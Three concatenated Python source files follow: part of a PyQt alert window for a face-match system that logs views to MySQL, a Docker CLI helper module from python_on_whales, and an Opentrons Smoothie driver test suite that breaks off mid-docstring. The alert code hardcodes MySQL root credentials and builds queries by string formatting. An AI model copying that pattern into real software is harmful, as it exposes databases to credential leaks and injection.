self.label_img2.setPixmap(pixmap) self.label_img2.setAlignment(QtCore.Qt.AlignCenter) P1 = multiprocessing.Process(target=self.view) P1.start() def view(self): ID = int(self.lineEdit_id.text()) connnection = pymysql.connect("localhost", "root", "rootpass", "project") cursor = connnection.cursor() select_query = ("select count(*) from view where id =%d") % (ID) cursor.execute(select_query) r = cursor.fetchone() v = int(r[0]) + 1 insert_query = "insert into view(id,curr_time,curr_date,visit) values(%d,curtime(),curdate(),%d)" % (ID, v) cursor.execute(insert_query) connnection.commit() connnection.close() def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(681, 343) MainWindow.setStyleSheet("*{\n" " color:rgb(186, 189, 182);\n" " background:rgb(46, 52, 54);\n" " font: 12pt \"URW Gothic L\";\n" "}\n" "QLineEdit{\n" " color:rgb(238, 238, 236);\n" " border:1px solid rgb(186, 189, 182);\n" " \n" "}") self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") self.label_img1 = QtWidgets.QLabel(self.centralwidget) self.label_img1.setGeometry(QtCore.QRect(20, 80, 151, 161)) self.label_img1.setStyleSheet("QLabel{\n" " border:1px solid rgb(211, 215, 207);\n" "}") self.label_img1.setText("") self.label_img1.setObjectName("label_img1") self.label_img2 = QtWidgets.QLabel(self.centralwidget) self.label_img2.setGeometry(QtCore.QRect(190, 80, 151, 161)) self.label_img2.setStyleSheet("QLabel{\n" " border:1px solid rgb(211, 215, 207);\n" "}") self.label_img2.setText("") self.label_img2.setObjectName("label_img2") self.btn_stopsiren = QtWidgets.QPushButton(self.centralwidget) self.btn_stopsiren.setGeometry(QtCore.QRect(110, 290, 171, 41)) self.btn_stopsiren.setStyleSheet("QPushButton{\n" " border:1px solid red; \n" " background:rgb(239, 41, 41);\n" " border-radius:15px;\n" " color:white;\n" "}\n" "QPushButton:hover{\n" " border:1px solid white;\n" "}") self.btn_stopsiren.setObjectName("btn_stopsiren") self.btn_sndmail = QtWidgets.QPushButton(self.centralwidget) self.btn_sndmail.setGeometry(QtCore.QRect(360, 290, 181, 41)) self.btn_sndmail.setStyleSheet("QPushButton{\n" " border:1px solid rgb(52, 101, 164); \n" " background:rgb(52, 101, 164);\n" " border-radius:15px;\n" " color:white;\n" "}\n" "QPushButton:hover{\n" " border: 1px solid white;\n" "}") self.btn_sndmail.setObjectName("btn_sndmail") self.lineEdit_id = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_id.setGeometry(QtCore.QRect(390, 60, 41, 21)) self.lineEdit_id.setObjectName("lineEdit_id") self.lineEdit_name = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_name.setGeometry(QtCore.QRect(520, 60, 141, 21)) self.lineEdit_name.setObjectName("lineEdit_name") self.lineEdit_age = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_age.setGeometry(QtCore.QRect(410, 100, 51, 21)) self.lineEdit_age.setObjectName("lineEdit_age") self.lineEdit_gender = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_gender.setGeometry(QtCore.QRect(552, 100, 111, 21)) self.lineEdit_gender.setObjectName("lineEdit_gender") self.lineEdit_nationality = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_nationality.setGeometry(QtCore.QRect(460, 140, 201, 21)) self.lineEdit_nationality.setObjectName("lineEdit_nationality") self.lineEdit_other = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_other.setGeometry(QtCore.QRect(450, 180, 211, 21)) self.lineEdit_other.setObjectName("lineEdit_other") self.label_3 = QtWidgets.QLabel(self.centralwidget) self.label_3.setGeometry(QtCore.QRect(360, 60, 21, 17)) self.label_3.setObjectName("label_3") self.label_4 = QtWidgets.QLabel(self.centralwidget) self.label_4.setGeometry(QtCore.QRect(460, 60, 51, 17)) self.label_4.setObjectName("label_4") self.label_5 = QtWidgets.QLabel(self.centralwidget) self.label_5.setGeometry(QtCore.QRect(360, 100, 41, 21)) self.label_5.setObjectName("label_5") self.label_6 = QtWidgets.QLabel(self.centralwidget) self.label_6.setGeometry(QtCore.QRect(480, 100, 67, 17)) self.label_6.setObjectName("label_6") self.label_7 = QtWidgets.QLabel(self.centralwidget) self.label_7.setGeometry(QtCore.QRect(360, 140, 91, 21)) self.label_7.setObjectName("label_7") self.label_8 = QtWidgets.QLabel(self.centralwidget) self.label_8.setGeometry(QtCore.QRect(360, 180, 81, 17)) self.label_8.setObjectName("label_8") self.label_9 = QtWidgets.QLabel(self.centralwidget) self.label_9.setGeometry(QtCore.QRect(360, 220, 91, 17)) self.label_9.setObjectName("label_9") self.label_11 = QtWidgets.QLabel(self.centralwidget) self.label_11.setGeometry(QtCore.QRect(130, 40, 121, 31)) self.label_11.setStyleSheet("QLabel{\n" " color:rgb(115, 210, 22);\n" " border:1px solid red;\n" "}") self.label_11.setObjectName("label_11") self.label_12 = QtWidgets.QLabel(self.centralwidget) self.label_12.setGeometry(QtCore.QRect(280, 0, 121, 41)) self.label_12.setStyleSheet("QLabel{\n" " color:white; \n" " font: 63 23pt \"URW Gothic L\";\n" "}") self.label_12.setObjectName("label_12") self.lineEdit_datetime = QtWidgets.QLineEdit(self.centralwidget) self.lineEdit_datetime.setGeometry(QtCore.QRect(450, 220, 211, 21)) self.lineEdit_datetime.setObjectName("lineEdit_datetime") self.label_13 = QtWidgets.QLabel(self.centralwidget) self.label_13.setGeometry(QtCore.QRect(40, 250, 111, 21)) self.label_13.setStyleSheet("QLabel{\n" " color:white;\n" "}") self.label_13.setObjectName("label_13") self.label_14 = QtWidgets.QLabel(self.centralwidget) self.label_14.setGeometry(QtCore.QRect(220, 250, 91, 21)) self.label_14.setStyleSheet("QLabel{\n" " color:white;\n" "}") self.label_14.setObjectName("label_14") MainWindow.setCentralWidget(self.centralwidget) self.retranslateUi(MainWindow) QtCore.QMetaObject.connectSlotsByName(MainWindow) pygame.mixer.init() pygame.mixer.music.load('Sound/siren.wav') pygame.mixer.music.play(0) self.P2 = multiprocessing.Process(target=self.send_mail) self.btn_sndmail.clicked.connect(self.P2.start) self.btn_stopsiren.clicked.connect(self.stop_) def retranslateUi(self, MainWindow): _translate = QtCore.QCoreApplication.translate MainWindow.setWindowTitle(_translate("MainWindow", "Area-2")) self.btn_stopsiren.setText(_translate("MainWindow", "Stop Siren/Mail")) self.btn_sndmail.setText(_translate("MainWindow", "Send Mail")) self.label_3.setText(_translate("MainWindow", "ID")) self.label_4.setText(_translate("MainWindow", "Name ")) self.label_5.setText(_translate("MainWindow", "Age")) self.label_6.setText(_translate("MainWindow", "Gender")) self.label_7.setText(_translate("MainWindow", "Nationality")) self.label_8.setText(_translate("MainWindow", "Other Info")) self.label_9.setText(_translate("MainWindow", "Date/Time")) self.label_11.setText(_translate("MainWindow", "Match Found")) self.label_12.setText(_translate("MainWindow", "ALERT!!!")) self.label_13.setText(_translate("MainWindow", "Enrolled Photo")) self.label_14.setText(_translate("MainWindow", "Last Match")) import img
utils.py
import os import subprocess from pathlib import Path from queue import Queue from subprocess import PIPE, Popen from threading import Thread from typing import Any, Dict, Iterable, List, Optional, Tuple, Union import pydantic from python_on_whales.exceptions import DockerException, NoSuchImage, NoSuchService PROJECT_ROOT = Path(__file__).parents[1] def title_if_necessary(string: str): if string.isupper(): return string else: return string.title() def to_docker_camel(string): try: special_cases = { "exec_ids": "ExecIDs", "sandbox_id": "SandboxID", "oom_killed": "OOMKilled", "rw": "RW", "link_local_ipv6_address": "LinkLocalIPv6Address", "link_local_ipv6_prefix_lenght": "LinkLocalIPv6PrefixLen", "secondary_ipv6_addresses": "SecondaryIPv6Addresses", "endpoint_id": "EndpointID", "global_ipv6_prefix_lenght": "GlobalIPv6PrefixLen", "ip_adress": "IPAddress", "ip_prefix_lenght": "IPPrefixLen", "ipv6_gateway": "IPv6Gateway", "network_id": "NetworkID", "ip_address": "IPAddress", "global_ipv6_address": "GlobalIPv6Address", "blkio_device_read_iops": "BlkioDeviceReadIOps", "blkio_device_write_iops": "BlkioDeviceWriteIOps", "device_ids": "DeviceIDs", "kernel_memory_tcp": "KernelMemoryTCP", "container_id_file": "ContainerIDFile", "uts_mode": "UTSMode", "root_fs": "RootFS", "enable_ipv6": "EnableIPv6", "ipv4_address": "IPv4Address", "ipv6_address": "IPv6Address", "ipam": "IPAM", "tls_info": "TLSInfo", "virtual_ips": "VirtualIPs", } return special_cases[string] except KeyError: return "".join(title_if_necessary(x) for x in string.split("_")) class DockerCamelModel(pydantic.BaseModel): class Config: alias_generator = to_docker_camel allow_population_by_field_name = True def run( args: List[Any], capture_stdout: bool = True, capture_stderr: bool = True, input: bytes = None, return_stderr: bool = False, env: Dict[str, str] = {}, ) -> Union[str, Tuple[str, str]]: args = [str(x) for x in args] subprocess_env = dict(os.environ) subprocess_env.update(env) if args[1] == "buildx": subprocess_env["DOCKER_CLI_EXPERIMENTAL"] = "enabled" if capture_stdout: stdout_dest = subprocess.PIPE else: stdout_dest = None if capture_stderr: stderr_dest = subprocess.PIPE else: stderr_dest = None if os.environ.get("PYTHON_ON_WHALES_DEBUG", "0") == "1": print("------------------------------") print("command: " + " ".join(args)) print(f"Env: {subprocess_env}") print("------------------------------") completed_process = subprocess.run( args, input=input, stdout=stdout_dest, stderr=stderr_dest, env=subprocess_env ) if completed_process.returncode != 0: if completed_process.stderr is not None: if "no such image" in completed_process.stderr.decode().lower(): raise NoSuchImage( args, completed_process.returncode, completed_process.stdout, completed_process.stderr, ) if "no such service" in completed_process.stderr.decode().lower(): raise NoSuchService( args, completed_process.returncode, completed_process.stdout, completed_process.stderr, ) raise DockerException( args, completed_process.returncode, completed_process.stdout, completed_process.stderr, ) if return_stderr: return ( post_process_stream(completed_process.stdout), post_process_stream(completed_process.stderr), ) else: return post_process_stream(completed_process.stdout) def post_process_stream(stream: Optional[bytes]): if stream is None: return "" stream = stream.decode() if len(stream) != 0 and stream[-1] == "\n": stream = stream[:-1] return stream ValidPath = Union[str, Path] def to_list(x) -> list: if isinstance(x, list): return x else: return [x] # backport of https://docs.python.org/3.9/library/stdtypes.html#str.removesuffix def removesuffix(string: str, suffix: str) -> str: if string.endswith(suffix): return string[: -len(suffix)] else: return string def removeprefix(string: str, prefix: str) -> str: if string.startswith(prefix): return string[len(prefix) :] else: return string def reader(pipe, pipe_name, queue): try: with pipe: for line in iter(pipe.readline, b""): queue.put((pipe_name, line)) finally: queue.put(None) def stream_stdout_and_stderr(full_cmd: list) -> Iterable[Tuple[str, bytes]]: full_cmd = list(map(str, full_cmd)) process = Popen(full_cmd, stdout=PIPE, stderr=PIPE) q = Queue() full_stderr = b"" # for the error message Thread(target=reader, args=[process.stdout, "stdout", q]).start() Thread(target=reader, args=[process.stderr, "stderr", q]).start() for _ in range(2): for source, line in iter(q.get, None): yield source, line if source == "stderr": full_stderr += line exit_code = process.wait() if exit_code != 0: raise DockerException(full_cmd, exit_code, stderr=full_stderr) def format_dict_for_cli(dictionary: Dict[str, str], separator="="): return [f"{key}{separator}{value}" for key, value in dictionary.items()] def read_env_file(env_file: Path) -> Dict[str, str]: result_dict = {} for line in env_file.read_text().splitlines(): line = line.strip() try: first_sharp = line.index("#") except ValueError: pass else: line = line[:first_sharp] if not line: continue line = line.strip() key, value = line.split("=") result_dict[key] = value return result_dict def read_env_files(env_files: List[Path]) -> Dict[str, str]: result_dict = {} for file in env_files: result_dict.update(read_env_file(file)) return result_dict def all_fields_optional(cls): """Decorator function used to modify a pydantic model's fields to all be optional.""" for field in cls.__fields__.values(): field.required = False field.allow_none = True return cls
test_driver.py
from copy import deepcopy from threading import Thread from unittest.mock import Mock import pytest from time import sleep from numpy import isclose from opentrons.trackers import pose_tracker from tests.opentrons.conftest import fuzzy_assert from opentrons.config.robot_configs import ( DEFAULT_GANTRY_STEPS_PER_MM, DEFAULT_PIPETTE_CONFIGS) from opentrons.drivers import serial_communication, utils, types from opentrons.drivers.smoothie_drivers import driver_3_0 def position(x, y, z, a, b, c): return {axis: value for axis, value in zip('XYZABC', [x, y, z, a, b, c])} def test_update_position(smoothie, monkeypatch): driver = smoothie def _new_send_message(self, command, timeout=None): return 'ok MCS: X:0.0000 Y:0.0000 Z:0.0000 A:0.0000 B:0.0000 C:0.0000' monkeypatch.setattr(driver, '_send_command', _new_send_message) driver.update_position() expected = { 'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0 } assert driver.position == expected count = 0 def _new_send_message2(self, command, timeout=None): nonlocal count # first attempt to read, we get bad data msg = 'ok MCS: X:0.0000 Y:MISTAKE Z:0.0000 A:0.0000 B:0.0000 C:0.0000' if count > 0: # any following attempts to read, we get good data msg = msg.replace('Y:MISTAKE', 'Y:0.0000') count += 1 return msg monkeypatch.setattr(driver, '_send_command', _new_send_message2) driver.update_position() expected = { 'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0 } assert driver.position == expected def test_remove_serial_echo(smoothie, monkeypatch): smoothie.simulating = False def return_echo_response(command, ack, connection, timeout, tag=None): if 'some-data' in command: return command + 'TESTS-RULE' return command monkeypatch.setattr(serial_communication, 'write_and_return', return_echo_response) cmd = 'G28.2B' res = smoothie._send_command( cmd, driver_3_0.SMOOTHIE_ACK) assert res == '' res = smoothie._send_command( '\r\n' + cmd + '\r\n\r\n', driver_3_0.SMOOTHIE_ACK) assert res == '' res = smoothie._send_command( '\r\n' + cmd + '\r\n\r\nsome-data\r\nok\r\n', driver_3_0.SMOOTHIE_ACK) assert res == 'TESTS-RULE' def return_echo_response(command, ack, connection, timeout, tag=None): if 'some-data' in command: return command.strip() + '\r\nT\r\nESTS-RULE' return command monkeypatch.setattr(serial_communication, 'write_and_return', return_echo_response) res = smoothie._send_command( '\r\n' + cmd + '\r\n\r\nsome-data\r\nok\r\n', driver_3_0.SMOOTHIE_ACK) assert res == 'TESTS-RULE' def test_parse_position_response(smoothie): good_data = 'ok M114.2 X:10 Y:20: Z:30 A:40 B:50 C:60' bad_data = 'ok M114.2 X:10 Y:20: Z:30A:40 B:50 C:60' res = driver_3_0._parse_position_response(good_data) expected = { 'X': 10, 'Y': 20, 'Z': 30, 'A': 40, 'B': 50, 'C': 60, } assert res == expected with pytest.raises(driver_3_0.ParseError): driver_3_0._parse_position_response(bad_data) def test_dwell_and_activate_axes(smoothie, monkeypatch): command_log = [] smoothie._setup() smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def _parse_position_response(arg): return smoothie.position monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.activate_axes('X') smoothie._set_saved_current() smoothie.dwell_axes('X') smoothie._set_saved_current() smoothie.activate_axes('XYBC') smoothie._set_saved_current() smoothie.dwell_axes('XC') smoothie._set_saved_current() smoothie.dwell_axes('BCY') smoothie._set_saved_current() expected = [ ['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M907 A0.1 B0.05 C0.05 X1.25 Y1.25 Z0.1 G4P0.005'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4P0.005'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_disable_motor(smoothie, monkeypatch): command_log = [] smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def _parse_position_response(arg): return smoothie.position monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.disengage_axis('X') smoothie.disengage_axis('XYZ') smoothie.disengage_axis('ABCD') expected = [ ['M18X'], ['M400'], ['M18[XYZ]+'], ['M400'], ['M18[ABC]+'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_plunger_commands(smoothie, monkeypatch): command_log = [] smoothie._setup() smoothie.home() smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def _parse_position_response(arg): return smoothie.position monkeypatch.setattr( serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.home() expected = [ ['M907 A0.8 B0.05 C0.05 X0.3 Y0.3 Z0.8 G4P0.005 G28.2.+[ABCZ].+'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M203.1 Y50'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.8 Z0.1 G4P0.005 G91 G0Y-28 G0Y10 G90'], ['M400'], ['M203.1 X80'], ['M400'], ['M907 A0.1 B0.05 C0.05 X1.25 Y0.3 Z0.1 G4P0.005 G28.2X'], ['M400'], ['M203.1 A125 B40 C40 X600 Y400 Z125'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M203.1 Y80'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y1.25 Z0.1 G4P0.005 G28.2Y'], ['M400'], ['M203.1 Y8'], ['M400'], ['G91 G0Y-3 G90'], ['M400'], ['G28.2Y'], ['M400'], ['G91 G0Y-3 G90'], ['M400'], ['M203.1 A125 B40 C40 X600 Y400 Z125'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ['M114.2'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) command_log = [] smoothie.move({'X': 0, 'Y': 1.123456, 'Z': 2, 'A': 3}) expected = [ ['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4P0.005 G0.+'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) command_log = [] smoothie.move({'B': 2}) expected = [ ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0B2'], ['M400'], ['M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) command_log = [] smoothie.move({ 'X': 10.987654321, 'Y': 2.12345678, 'Z': 2.5, 'A': 3.5, 'B': 4.25, 'C': 5.55}) expected = [ # Set active axes high ['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4P0.005 G0.+[BC].+'], # noqa(E501) ['M400'], # Set plunger current low ['M907 A0.8 B0.05 C0.05 X1.25 Y1.25 Z0.8 G4P0.005'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_set_active_current(smoothie, monkeypatch): command_log = [] smoothie._setup() smoothie.home() smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def _parse_position_response(arg): return smoothie.position monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.set_active_current( {'X': 2, 'Y': 2, 'Z': 2, 'A': 2, 'B': 2, 'C': 2}) smoothie.set_dwelling_current( {'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0}) smoothie.move({'X': 0, 'Y': 0, 'Z': 0, 'A': 0, 'B': 0, 'C': 0}) smoothie.move({'B': 1, 'C': 1}) smoothie.set_active_current({'B': 0.42, 'C': 0.42}) smoothie.home('BC') expected = [ # move all ['M907 A2 B2 C2 X2 Y2 Z2 G4P0.005 G0A0B0C0X0Y0Z0'], ['M400'], ['M907 A2 B0 C0 X2 Y2 Z2 G4P0.005'], # disable BC axes ['M400'], # move BC ['M907 A0 B2 C2 X0 Y0 Z0 G4P0.005 G0B1.3C1.3 G0B1C1'], ['M400'], ['M907 A0 B0 C0 X0 Y0 Z0 G4P0.005'], # disable BC axes ['M400'], ['M907 A0 B0.42 C0.42 X0 Y0 Z0 G4P0.005 G28.2BC'], # home BC ['M400'], ['M907 A0 B0 C0 X0 Y0 Z0 G4P0.005'], # dwell all axes after home ['M400'], ['M114.2'], # update the position ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_steps_per_mm(smoothie, monkeypatch): # Check that steps_per_mm dict gets loaded with defaults on start assert smoothie.steps_per_mm == {} smoothie._setup() expected = { **DEFAULT_GANTRY_STEPS_PER_MM, 'B': DEFAULT_PIPETTE_CONFIGS['stepsPerMM'], 'C': DEFAULT_PIPETTE_CONFIGS['stepsPerMM'], } assert smoothie.steps_per_mm == expected smoothie.update_steps_per_mm({'Z': 450}) expected['Z'] = 450 assert smoothie.steps_per_mm == expected def test_pipette_configs(smoothie, monkeypatch): axis_value = 'home updated 175' smoothie._send_command = Mock(return_value=axis_value) res = smoothie.update_pipette_config('Z', {'home': 175}) expected_return = {'Z': {'home': 175}} assert res == expected_return def test_set_acceleration(smoothie, monkeypatch): command_log = [] smoothie._setup() smoothie.home() smoothie.simulating = False def write_with_log(command, ack, connection, timeout, tag=None): command_log.append(command.strip()) return driver_3_0.SMOOTHIE_ACK def _parse_position_response(arg): return smoothie.position monkeypatch.setattr(serial_communication, 'write_and_return', write_with_log) monkeypatch.setattr( driver_3_0, '_parse_position_response', _parse_position_response) smoothie.set_acceleration( {'X': 1, 'Y': 2, 'Z': 3, 'A': 4, 'B': 5, 'C': 6}) smoothie.push_acceleration() smoothie.pop_acceleration() smoothie.set_acceleration( {'X': 10, 'Y': 20, 'Z': 30, 'A': 40, 'B': 50, 'C': 60}) smoothie.pop_acceleration() expected = [ ['M204 S10000 A4 B5 C6 X1 Y2 Z3'], ['M400'], ['M204 S10000 A4 B5 C6 X1 Y2 Z3'], ['M400'], ['M204 S10000 A40 B50 C60 X10 Y20 Z30'], ['M400'], ['M204 S10000 A4 B5 C6 X1 Y2 Z3'], ['M400'], ] fuzzy_assert(result=command_log, expected=expected) def test_active_dwelling_current_push_pop(smoothie): assert smoothie._active_current_settings != \ smoothie._dwelling_current_settings old_active_currents = deepcopy(smoothie._active_current_settings) old_dwelling_currents = deepcopy(smoothie._dwelling_current_settings) smoothie.push_active_current() smoothie.set_active_current({'X': 2.0, 'Y': 2.0, 'Z': 2.0, 'A': 2.0}) smoothie.pop_active_current() assert smoothie._active_current_settings == old_active_currents assert smoothie._dwelling_current_settings == old_dwelling_currents def test_functional(smoothie): assert smoothie.position == position(0, 0, 0, 0, 0, 0) smoothie.move({'X': 0, 'Y': 1, 'Z': 2, 'A': 3, 'B': 4, 'C': 5}) assert smoothie.position == position(0, 1, 2, 3, 4, 5) smoothie.move({'X': 1, 'Z': 3, 'C': 6}) assert smoothie.position == position(1, 1, 3, 3, 4, 6) smoothie.home(axis='abc', disabled='') assert smoothie.position == position( 1, 1, 3, smoothie.homed_position['A'], smoothie.homed_position['B'], smoothie.homed_position['C']) smoothie.home(disabled='') assert smoothie.position == smoothie.homed_position @pytest.mark.api1_only def test_set_pick_up_current(model, monkeypatch): driver = model.robot._driver set_current = driver._save_current current_log = [] def set_current_mock(target, axes_active=True): nonlocal current_log current_log.append(target) set_current(target, axes_active) monkeypatch.setattr(driver, '_save_current', set_current_mock) driver.update_homed_flags({ax: True for ax in 'XYZABC'}) rack = model.robot.add_container('tiprack-200ul', '10') pipette = model.instrument._instrument pipette.set_pick_up_current(0.42) pipette.pick_up_tip(rack[0], presses=1) # Instrument in `model` is configured to right mount, which is the A axis # on the Smoothie (see `Robot._actuators`) expected = [ {'C': 0.5}, {'C': 0.05}, {'A': 0.8}, {'A': 0.1}, {'X': 1.25, 'Y': 1.25}, {'X': 0.3, 'Y': 0.3}, {'A': 0.8}, {'A': 0.42}, {'A': 0.8}, {'A': 0.1} ] assert current_log == expected @pytest.mark.xfail @pytest.mark.api1_only def test_drop_tip_current(model, monkeypatch): # TODO: All of these API 1 tests either need to be removed or moved to # a different test file. The ones using the model fixture rely on # some ugly things created in RPC. Ideally, all of these tests should # be testing methods in the smoothie directly. driver = model.driver old_save_current = driver._save_current current_log = [] def mock_save_current(settings, axes_active=True): nonlocal current_log if 'C' in settings: current_log.append(settings) old_save_current(settings, axes_active) monkeypatch.setattr(driver, '_save_current', mock_save_current) rack = model.robot.add_container('tiprack-200ul', '10') pipette = model.instrument._instrument pipette._plunger_current = 0.123 pipette._drop_tip_current = 0.456 pipette.drop_tip(rack[0]) # Instrument in `model` is configured to right mount, which is the A axis # on the Smoothie (see `Robot._actuators`) expected = [ {'C': 0.123}, # move to 'bottom' position {'C': 0.05}, # dwell {'C': 0.456}, # move to 'drop_tip' position {'C': 0.05}, # dwell {'C': 0.123}, # fast-home move upwards {'C': 0.05}, # dwell {'C': 0.123}, # fast-home home command {'C': 0.05}, # dwell {'C': 0.123}, # move back to 'bottom' position {'C': 0.05} # dwell ] assert current_log == expected def test_parse_pipette_data(): msg = 'TestsRule!!' mount = 'L' good_data = mount + ': ' \ + driver_3_0._byte_array_to_hex_string(msg.encode()) parsed = driver_3_0._parse_instrument_data(good_data).get(mount) assert parsed.decode() == msg def test_read_and_write_pipettes(smoothie, monkeypatch): driver = smoothie written_id = '' written_model = '' mount = 'L' def _new_send_message( command, timeout=None, suppress_error_msg=True): nonlocal written_id, written_model, mount if driver_3_0.GCODES['READ_INSTRUMENT_ID'] in command: return mount + ': ' + written_id elif driver_3_0.GCODES['READ_INSTRUMENT_MODEL'] in command: return mount + ': ' + written_model if driver_3_0.GCODES['WRITE_INSTRUMENT_ID'] in command: written_id = command[command.index(mount) + 1:] elif driver_3_0.GCODES['WRITE_INSTRUMENT_MODEL'] in command: written_model = command[command.index(mount) + 1:] monkeypatch.setattr(driver, '_send_command', _new_send_message) test_id = 'TestsRock!!' test_model = 'TestPipette' driver.write_pipette_id('left', test_id) driver.simulating = False read_id = driver.read_pipette_id('left') driver.simulating = True assert read_id == test_id driver.write_pipette_model('left', test_model) driver.simulating = False read_model = driver.read_pipette_model('left') driver.simulating = True assert read_model == test_model + '_v1' def test_read_pipette_v13(smoothie, monkeypatch): driver = smoothie driver.simulating = False def _new_send_message( command, timeout=None, suppress_error_msg=True): return 'L:' + driver_3_0._byte_array_to_hex_string(b'p300_single_v13') monkeypatch.setattr(driver, '_send_command', _new_send_message) res = driver.read_pipette_model('left') assert res == 'p300_single_v1.3' def test_fast_home(smoothie, monkeypatch): driver = smoothie move = driver.move coords = [] def move_mock(target): nonlocal coords coords.append(target) move(target) monkeypatch.setattr(driver, 'move', move_mock) assert coords == [] driver.fast_home(axis='X', safety_margin=12) assert coords == [{'X': driver.homed_position['X'] - 12}] assert driver.position['X'] == driver.homed_position['X'] def test_homing_flags(smoothie, monkeypatch): driver = smoothie def is_connected_mock(): return True monkeypatch.setattr(driver, 'is_connected', is_connected_mock) driver.simulating = False def send_mock(target): smoothie_homing_res = 'X:0 Y:1 Z:0 A:1 B:0 C:1\r\n' return smoothie_homing_res monkeypatch.setattr(driver, '_send_command', send_mock) expected = { 'X': False, 'Y': True, 'Z': False, 'A': True, 'B': False, 'C': True } driver.update_homed_flags() flags = driver.homed_flags assert flags == expected def test_switch_state(smoothie, monkeypatch): driver = smoothie def send_mock(target): smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:0 B_max:0 C_max:0' smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 0\r\n' return smoothie_switch_res monkeypatch.setattr(driver, '_send_command', send_mock) expected = { 'X': False, 'Y': False, 'Z': False, 'A': False, 'B': False, 'C': False, 'Probe': False } assert driver.switch_state == expected def send_mock(target): smoothie_switch_res = 'X_max:0 Y_max:0 Z_max:0 A_max:1 B_max:0 C_max:0' smoothie_switch_res += ' _pins ' smoothie_switch_res += '(XL)2.01:0 (YL)2.01:0 (ZL)2.01:0 ' smoothie_switch_res += '(AL)2.01:0 (BL)2.01:0 (CL)2.01:0 Probe: 1\r\n' return smoothie_switch_res monkeypatch.setattr(driver, '_send_command', send_mock) expected = { 'X': False, 'Y': False, 'Z': False, 'A': True, 'B': False, 'C': False, 'Probe': True } assert driver.switch_state == expected def test_clear_limit_switch(smoothie, monkeypatch): """ This functions as a contract test around recovery from a limit-switch hit. Note that this *does not* itself guarantee correct physical behavior--this interaction has been designed and tested on the robot manually and then encoded in this test. If requirements change around physical behavior, then this test will need to be revised. """ driver = smoothie driver.home('xyza') cmd_list = [] def write_mock(command, ack, serial_connection, timeout, tag=None): nonlocal cmd_list cmd_list.append(command) if driver_3_0.GCODES['MOVE'] in command: return "ALARM: Hard limit +C" elif driver_3_0.GCODES['CURRENT_POSITION'] in command: return 'ok M114.2 X:10 Y:20: Z:30 A:40 B:50 C:60' else: return "ok" monkeypatch.setattr(serial_communication, 'write_and_return', write_mock) driver.simulating = False # This will cause a limit-switch error and not back off with pytest.raises(driver_3_0.SmoothieError): driver.move({'C': 100}) assert [c.strip() for c in cmd_list] == [ # attempt to move and fail 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G0C100.3 G0C100', # noqa(E501) # recover from failure 'M999', 'M400', # set current for homing the failed axis (C) 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005 G28.2C', 'M400', # set current back to idling after home 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'M400', # update position 'M114.2', 'M400', 'M907 A0.1 B0.05 C0.05 X0.3 Y0.3 Z0.1 G4P0.005', 'M400', ] @pytest.mark.api1_only def test_pause_resume(model): """ This test has to use an ugly work-around with the `simulating` member of the 